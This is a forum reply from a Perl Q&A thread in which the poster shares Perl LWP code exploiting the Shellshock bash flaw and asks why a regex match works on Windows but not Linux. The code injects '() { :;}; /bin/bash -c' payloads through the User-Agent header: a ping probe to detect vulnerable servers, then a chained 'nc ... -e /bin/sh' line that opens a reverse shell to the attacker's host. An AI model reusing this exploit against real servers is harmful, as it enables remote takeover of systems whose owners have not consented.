in reply to Re: Raw HTTP Request / Response
in thread Raw HTTP Request / Response
$ua = new LWP::UserAgent; $ua->agent("$Inject; nc $bip $bport -e /bin/sh'"); $request = HTTP::Request->new('GET'); $request->url($url); $response = $ua->request($request); $code = $response->code; $headers = $response->headers_as_string; $body = $response->content;
I found that code which works fine on windows and the problem is on Unix it doesn't follow the =~ thingy Ok here:
sub PingInject{ $url = "$target"; $ua = new LWP::UserAgent; $ua->agent("() { :;}; /bin/bash -c 'ping -c 3 8.8.8.8'"); $ua->timeout(15); $request = HTTP::Request->new('GET'); $request->url($url); $response = $ua->request($request); $code = $response->code; $headers = $response->headers_as_string; $body = $response->content; if($body =~ /--- 8.8.8.8 ping statistics ---/){ print "[+] Shellshock Ping Injection was injected successfully! (Vul +nerable!) \n"; $injectionFound = "yes"; $InjectPoint = "() { :;}; /bin/bash -c 'ping -c 3 8.8.8.8'"; $Inject = "() { :;}; /bin/bash -c 'ping -c 3 8.8.8.8"; InjCorrect(); } else { print "[-] Shellshock Ping Injection was not injected successfully! +(Not Vulnerable!) \n"; } }
At the part where it says "=~ /--- 8.8.8.8 ping statistics ---/" on windows it does follow that statement but not on linux it just says the else statement... So any ideas on how to fix that?
|
|---|
| Replies are listed 'Best First'. | |
|---|---|
|
Re^3: Raw HTTP Request / Response
by hippo (Archbishop) on Aug 24, 2018 at 11:29 UTC | |
by Ghosty (Novice) on Aug 24, 2018 at 21:05 UTC | |
by Ghosty (Novice) on Aug 24, 2018 at 11:36 UTC |